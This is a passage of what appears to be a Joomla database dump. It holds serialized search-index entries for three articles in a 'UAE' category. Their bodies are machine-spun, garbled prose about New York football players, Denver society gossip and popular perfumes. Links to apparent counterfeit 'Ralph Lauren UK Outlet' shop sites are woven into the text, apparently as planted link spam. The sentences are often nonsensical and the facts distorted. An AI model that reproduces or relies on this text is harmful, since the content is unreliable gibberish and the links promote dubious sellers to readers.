03:49:32\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:1:\"1\";s:8:\"category\";s:3:\"UAE\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:20:\"138:business-pages-9\";s:7:\"catslug\";s:6:\"84:uae\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:37:\"index.php/84-uae/138-business-pages-9\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:3:\"UAE\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:3:\"UAE\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=138\";s:5:\"route\";s:89:\"index.php?option=com_content&view=article&id=138:business-pages-9&catid=84:uae&Itemid=435\";s:5:\"title\";s:5:\"DLALA\";s:11:\"description\";s:2649:\"Howie long takes puppet form for pizza hut super bowl large Syers, who often performs in new york square park, crafted a marionette that looks just like fox analyst howie long in four days that allows you to shoot an ad with the former raider that will air before super bowl xlviii on sunday.It usually requires syers four to five days to build his marionettes, but he usually takes a week to refine it.He wasn\'t afforded that luxury on this project.He was called on jan.14, Got verification for the ad two days later and it was filmed last Tuesday at FOX\'s temporary Times Square studio at Duffy Square. The puppet is a busting image of long.Syers had to cut fabric from one of his ralph lauren suits build a mini suit for the long marionette.It was 13 degrees plus wind chill for a single and a half hour shoot. Syers said as you\'re long saw the puppet, long considered\"I decided to seen everything in my life.It\'s true that i have, May very well 7, 10:36PM Victor cruz chooses to be a team captain Victor cruz made it perfectly clear on wednesday that beyond just exciting the giants offense in 2014, the 27 year old receiver also covets another fact.He wishes to be a team captain. \"Absolutely, cruz said in respond to a question of by ebenezer samuel Would probably 7, 12:58AM Knight in shining armor amukamara says he was\"Treated\"Giants learned option The giants used the fifth year option on cornerback prince amukamara\'s contract last week.Positive thing, at the same time, because amukamara wouldn\'t have been happy if they did not. \"For certain relieved, amukamara said the particular giants p. By rob vacchiano May likely 6, 1:22PM A look at several hits and misses of jerry reese\'s seven year draft http://www.ycol.co.uk/ record Jerry reese, the giants\' gm, knows that in today\'s nflthere\'s bit of time for developing players especially high draft picks.And once he makes his first, second, and third round picks in the nfl draft on thurs.And friday, he aim. Appear full blog April 29, 2:28PM Geno smith you should take initial first team reps at minicamp If geno smith had been studying marty mornhinweg talk on tuesday, he can have liked what he heard. Smith is headed for a quarterback competition with michael vick, and mornhinweg said tuesday that smith takes the opening shot Polo Ralph Lauren Outlet with. April 26, 8:24PM Rex ryan on drafting a protecting lineman:\'That may well funny\' No one knows who the jets uses in the first round of the upcoming nfl draft, but there\'s one position that seems safe to eliminate:Preventative lineman.That\'s modern strength of the jets after the team took a defensive lineman in the first ro.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2014-03-31 06:04:29\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-03-31 06:04:29\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(105,'index.php?option=com_content&view=article&id=137','index.php?option=com_content&view=article&id=137:business-pages-8&catid=84:uae&Itemid=435','fsc','Ace archer needs her bow with ralph lauren Who says we\'re not clean? Joy fahrenkrog is the denver kid of well known kentwood city realtor judy fahrenkrog and ralph lauren\'s latest model.Feeling that puts her in very comely company. Joy is an ace archer an','2015-05-13 01:14:26','d05714cb5cf90374da0c3dae1a1e8b08',1,1,1,'en-GB','2014-03-31 06:04:29','0000-00-00 00:00:00','2014-03-31 06:04:29','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"137\";s:5:\"alias\";s:16:\"business-pages-8\";s:7:\"summary\";s:3842:\"<p>Ace archer needs her bow with ralph lauren <br /><br />Who says we\'re not clean?<br /><br />Joy fahrenkrog is the denver kid of well known kentwood city realtor judy fahrenkrog and ralph lauren\'s latest model.Feeling that puts her in very comely company.<br /><br />Joy is an ace archer and was chosen by lauren to star in some print ads, by using three other elite jocks, to model his olympic rasing and lowering ceremony uniforms.She missed the olympic games cut this past weekend, but she achieved lauren\'s.The ads will start appearing this month in many mags while the cover of the tony hamptons magazine.<br /><br />Cu boulder student leonard sun was just named peta\'s cutest all-Vegetable alive.From easily 1, 700 males nominees and 55, 000 ballots, sun is the greatest vegan in the meat market.<br /><br />In a introduce, sun defined,\"Meat is gross and poor, and it\'s fair to eat animals(Recently)On account that we can, <br /><br />Hot l denver colorado <br /><br />I have been on stage twice in denver.Once as a supernumerary in ie colorado\'s\"Stop working fledermaus, i think i flubbed the line announcing the appearance of someone.<br /><br />And i gamed a\"Diane\"At the barth hotel in john ashton\'s legendary 1991 output of\"The recent l baltimore, the toy, about a rundown hotel and its off the beaten track residents, was displayed in the lobby of the barth hotel, the lodo family home hall that\'s part of denver senior options.People wandered in and out of the lobby as the play went on it was great and i was one of the several denverites who had a one night walk on role.<br /><br />Before i was able to utter my line, actor pam clifton had me pushed with a doorway.<br /><br />But give up show commercial?Remember not to!I\'m down to do a walk on in the coming revival of\"Quite l, again heading towards barth hotel, july 18 associated with aug.23.<br /><br />Ashton can\'t produce the, but he\'ll do a stroll on.And same goes with ed sardella.And ann kiely.And a great other denver bold names.Stay tuned for more and stay at the hot l!<br /><br />Outline the clown <br /><br />Molly kleeman is perhaps also known as skiddles the clown.She\'s been slapping on the make <b><a title=\"Ralph Lauren UK:http://www.ycol.co.uk/\" href=\"http://www.ycol.co.uk\">Ralph Lauren UK:http://www.ycol.co.uk/</a></b> up and the red nose in denver since 1996 and she\'s recently back from the world clown connections convention in lake buena vista, fla.<br /><br />She\'s won clown, coming back home with three medals:A bronze in knowledgeable balloons, silver in paradeability and the gold in makeup and armoire.Blind and disrobed.<br /><br />That\'s how rioja is accounts receivable its may 19 wine event.The bottles to get naked, no trademarks, so the tasting will be blind as you pair up four courses with grapes from all over the world.<br /><br />In the mean time, goose sorensen at solera on monday night served up a blind tazo tea infused mouth watering <b><a title=\"Ralph Lauren UK Outlet\" href=\"http://www.ycol.co.uk/ralph-lauren-uk-outlet.html\">Ralph Lauren UK Outlet</a></b> dinner where diners were blindfolded.<br /><br />Not sure yet on a naked dinner.<br /><br />City internal <br /><br />Go to william matthews\' new watercolors, u s of a\'s pictorials, at her or the puppy\'s gallery at 1617 wazee st.Noel and tammy cunningham will be honored at the may 22 denver sister cities essential dinner.Salman rushdie skedded for the aspen lit competition june 22 26.May 30 is pierre wolfe day at challenges.Elway\'s summer music series starts june 11 over the railbenders and ends aug.13 with a return bridal.Tambien(With holly kylberg internet)Beat mezcal at thursday\'s eating out for life celebrity style tip off.Sez who have: \"For travel to be exquisite, one must have a great place to leave and return to, frederick s.Wilcox <br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"84\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-05-13 05:14:22\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:1:\"2\";s:8:\"category\";s:3:\"UAE\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:20:\"137:business-pages-8\";s:7:\"catslug\";s:6:\"84:uae\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:37:\"index.php/84-uae/137-business-pages-8\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:3:\"UAE\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:3:\"UAE\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=137\";s:5:\"route\";s:89:\"index.php?option=com_content&view=article&id=137:business-pages-8&catid=84:uae&Itemid=435\";s:5:\"title\";s:3:\"fsc\";s:11:\"description\";s:3415:\"Ace archer needs her bow with ralph lauren Who says we\'re not clean? Joy fahrenkrog is the denver kid of well known kentwood city realtor judy fahrenkrog and ralph lauren\'s latest model.Feeling that puts her in very comely company. Joy is an ace archer and was chosen by lauren to star in some print ads, by using three other elite jocks, to model his olympic rasing and lowering ceremony uniforms.She missed the olympic games cut this past weekend, but she achieved lauren\'s.The ads will start appearing this month in many mags while the cover of the tony hamptons magazine. Cu boulder student leonard sun was just named peta\'s cutest all-Vegetable alive.From easily 1, 700 males nominees and 55, 000 ballots, sun is the greatest vegan in the meat market. In a introduce, sun defined,\"Meat is gross and poor, and it\'s fair to eat animals(Recently)On account that we can, Hot l denver colorado I have been on stage twice in denver.Once as a supernumerary in ie colorado\'s\"Stop working fledermaus, i think i flubbed the line announcing the appearance of someone. And i gamed a\"Diane\"At the barth hotel in john ashton\'s legendary 1991 output of\"The recent l baltimore, the toy, about a rundown hotel and its off the beaten track residents, was displayed in the lobby of the barth hotel, the lodo family home hall that\'s part of denver senior options.People wandered in and out of the lobby as the play went on it was great and i was one of the several denverites who had a one night walk on role. Before i was able to utter my line, actor pam clifton had me pushed with a doorway. But give up show commercial?Remember not to!I\'m down to do a walk on in the coming revival of\"Quite l, again heading towards barth hotel, july 18 associated with aug.23. Ashton can\'t produce the, but he\'ll do a stroll on.And same goes with ed sardella.And ann kiely.And a great other denver bold names.Stay tuned for more and stay at the hotl! Outline the clown Molly kleeman is perhaps also known as skiddles the clown.She\'s been slapping on the make Ralph Lauren UK:http://www.ycol.co.uk/ up and the red nose in denver since 1996 and she\'s recently back from the world clown connections convention in lake buena vista, fla. She\'s won clown, coming back home with three medals:A bronze in knowledgeable balloons, silver in paradeability and the gold in makeup and armoire.Blind and disrobed. That\'s how rioja is accounts receivable its may 19 wine event.The bottles to get naked, no trademarks, so the tasting will be blind as you pair up four courses with grapes from all over the world. In the mean time, goose sorensen at solera on monday night served up a blind tazo tea infused mouth watering Ralph Lauren UK Outlet dinner where diners were blindfolded. Not sure yet on a naked dinner. City internal Go to william matthews\' new watercolors, u s of a\'s pictorials, at her or the puppy\'s gallery at 1617 wazee st.Noel and tammy cunningham will be honored at the may 22 denver sister cities essential dinner.Salman rushdie skedded for the aspen lit competition june 22 26.May 30 is pierre wolfe day at challenges.Elway\'s summer music series starts june 11 over the railbenders and ends aug.13 with a return bridal.Tambien(With holly kylberg internet)Beat mezcal at thursday\'s eating out for life celebrity style tip off.Sez who have: \"For travel to be exquisite, one must have a great place to leave and return to, frederick s.Wilcox\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2014-03-31 06:04:29\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-03-31 06:04:29\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(106,'index.php?option=com_content&view=article&id=136','index.php?option=com_content&view=article&id=136:business-pages-7&catid=84:uae&Itemid=435','ALSHOROOQ','10 Popular perfume Perfume is a wonderful accessory women love to wear.It\'s fantastic finish off a look or serves as a great pick me up.Here is a list of 10 popular perfumes loved by women in every location. 1.Chanel it doesn\'t.5 Chanel absolutely.5 is a ','2015-05-14 22:52:01','1e078a8f580f558bead8fecde65b034b',1,1,1,'en-GB','2014-03-31 06:04:29','0000-00-00 00:00:00','2014-03-31 06:04:29','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"136\";s:5:\"alias\";s:16:\"business-pages-7\";s:7:\"summary\";s:4194:\"<p>10 Popular perfume <br /><br />Perfume is a wonderful accessory women love to wear.It\'s fantastic finish off a look or serves as a great pick me up.Here is a list of 10 popular perfumes loved by women in every location.<br /><br />1.Chanel it doesn\'t.5 <br /><br />Chanel absolutely.5 is a preferred and classic perfume.Here first ever perfume launched by coco chanel herself.It is the most famous perfume in the world according to many and makes millions per year.This not online perfume has aldehydes, lime, ylang ylang, rose bush, jasmine, lily of the area, sandalwood, vetiver and amber loans.Ernest beaux was the chemist who created this excellent perfume that has been worn by many celebrities including marilyn monroe.<br /><br />Daisy is <b><a title=\"polo homepage\" href=\"http://www.stevegriffin.co.uk\">polo homepage</a></b> a youthful and not too serious perfume that many ladies love.This light and fresh scent has notes of blood, violet leaving, dark red red grapefruit, gardenia, violet flower petals and leaves, jasmine flower petals and leaves, musk, vanilla flavouring and white woods.The bottle for this perfume matches the scent nicely featuring its flower top and feminine shape.<br /><br />6.Ralph lauren beauty <br /><br />This enchantment perfume is a love story in a bottle.Wear this scent and you get many compliments from women and men.This is also the perfect gift for men to get their spouse.This classic scent has notes of sungoddess rose, marigold, cinnamon, linden oil, teal freesia, bright violet, lotus wedding plants, day lily, patchouli, oakmoss, and consequently musk.This perfume has been a favorite to many women who wear it anywhere for any special occasion.<br /><br />7.Giorgio armani code fill femme <br /><br />This sexy perfume has amazing endurance.Many for women who live testified how this fresh and feminine scent lasts all day.Armani code pour femme has sees of blood orange, ginger herb, pear sorbet, sambac jasmine, orange floral, seringa bloom, rose honey, valuable woods complex, and vanilla flavouring.Attractive and confident when wearing this feminine scent.8.Jimmy choo <br /><br />Jimmy choo is a perfume that is representative of the modern woman.It has an strengthening, beautiful and irresisteble feel when worn.The scent is contains tiger orchard, pear nectar, sweet chinese orange, toffee, indonesian patchouli, and spicey chypre notes.The brand founder and chief creative officer tamara mellon created a bottle and box that represented her preferences.The bottle design was inspired by jewel colored venetian murano glass and suits the brand many crystal encrusted shoes.This confident and sexy scent is worn by a lot of women worldwide.<br /><br />9.L\'air du conditions by nina ricci <br /><br />This floral and spicy perfume was made in france in 1948.It is an iconic perfume from the nina ricci house acquiring passion and elegance.L du temps is nina ricci most famous perfume and the scent was created by the effort of <b><a title=\"Ralph Lauren Outlet UK\" href=\"http://www.stevegriffin.co.uk\">Ralph Lauren Outlet UK</a></b> robert ricci and perfumer francis fabron.The scent reflects the product or service values of peace, wholesomeness, autonomy and love.This scented has notes of peach, carnation, bergamot, rosewood, peppermint, gardenia, orchid, cloves, jasmine, orris origin, eye, designer, benzoin, forest, vetiver in addition, sasalwood.This fresh and timeless scent brings out sensual charm and refinement from the wearer.10.Jean robert gaultier classique <br /><br />This perfume was jean paul gaultier first parfum launched in 1993.It is a woman floral oriental scent that is sensual and progressed.Jean paul gaultier is not a boring designer and he was able to bring that hallmark of himself into this perfume.This scented has notes of rum essence, rose fact, vanilla flavor orchid, daffodil, bourbon vanilla flavouring, pleasant amber, sandalwood genuine, tonka bean and emerald.As for the structure of this perfume bottle, it mimics a girly figure.Year in year out this brand re dresses the torso, package deals it, and sells it again as limited updates.This perfume is both elegant and classic.<br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"84\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-05-15 02:52:00\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:1:\"3\";s:8:\"category\";s:3:\"UAE\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:20:\"136:business-pages-7\";s:7:\"catslug\";s:6:\"84:uae\";s:6:\"author\";s:10:\"Super 